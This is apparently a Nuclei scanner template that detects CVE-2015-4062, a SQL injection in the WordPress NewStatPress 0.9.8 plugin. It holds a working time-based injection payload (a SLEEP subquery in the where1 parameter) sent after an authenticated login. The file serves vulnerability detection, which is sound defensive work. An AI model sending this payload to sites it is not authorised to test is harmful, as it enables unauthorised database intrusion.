nuclei-templates/http/cves/2015/CVE-2015-4062.yaml

53 lines
1.8 KiB
YAML
Raw Normal View History

2023-03-05 13:42:10 +00:00
id: CVE-2015-4062
info:
name: WordPress NewStatPress 0.9.8 - SQL Injection
2023-03-05 13:42:10 +00:00
author: r3Y3r53
2023-07-11 19:49:27 +00:00
severity: medium
2023-03-05 13:42:10 +00:00
description: |
WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php.
2023-03-05 13:42:10 +00:00
reference:
- https://packetstormsecurity.com/files/132038/
- https://wordpress.org/plugins/newstatpress
- http://packetstormsecurity.com/files/132038/WordPress-NewStatPress-0.9.8-Cross-Site-Scripting-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-4062
2023-07-15 16:29:17 +00:00
- https://wordpress.org/plugins/newstatpress/changelog/
2023-03-05 13:42:10 +00:00
remediation: |
Update to plugin version 0.9.9 or latest.
2023-03-05 13:42:10 +00:00
classification:
2023-07-11 19:49:27 +00:00
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:P/A:P
cvss-score: 6.5
2023-03-05 13:42:10 +00:00
cve-id: CVE-2015-4062
cwe-id: CWE-89
2023-07-11 19:49:27 +00:00
epss-score: 0.03336
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.90106
2023-03-05 13:42:10 +00:00
metadata:
max-request: 2
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
framework: wordpress
vendor: newstatpress_project
product: newstatpress
tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp
2023-03-05 13:42:10 +00:00
http:
2023-03-05 13:42:10 +00:00
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?where1=1+AND+(SELECT+3066+FROM+(SELECT(SLEEP(6)))CEHy)&limitquery=1&searchsubmit=Buscar&page=nsp_search HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body_2, "newstatpress_page_nsp_search")'
condition: and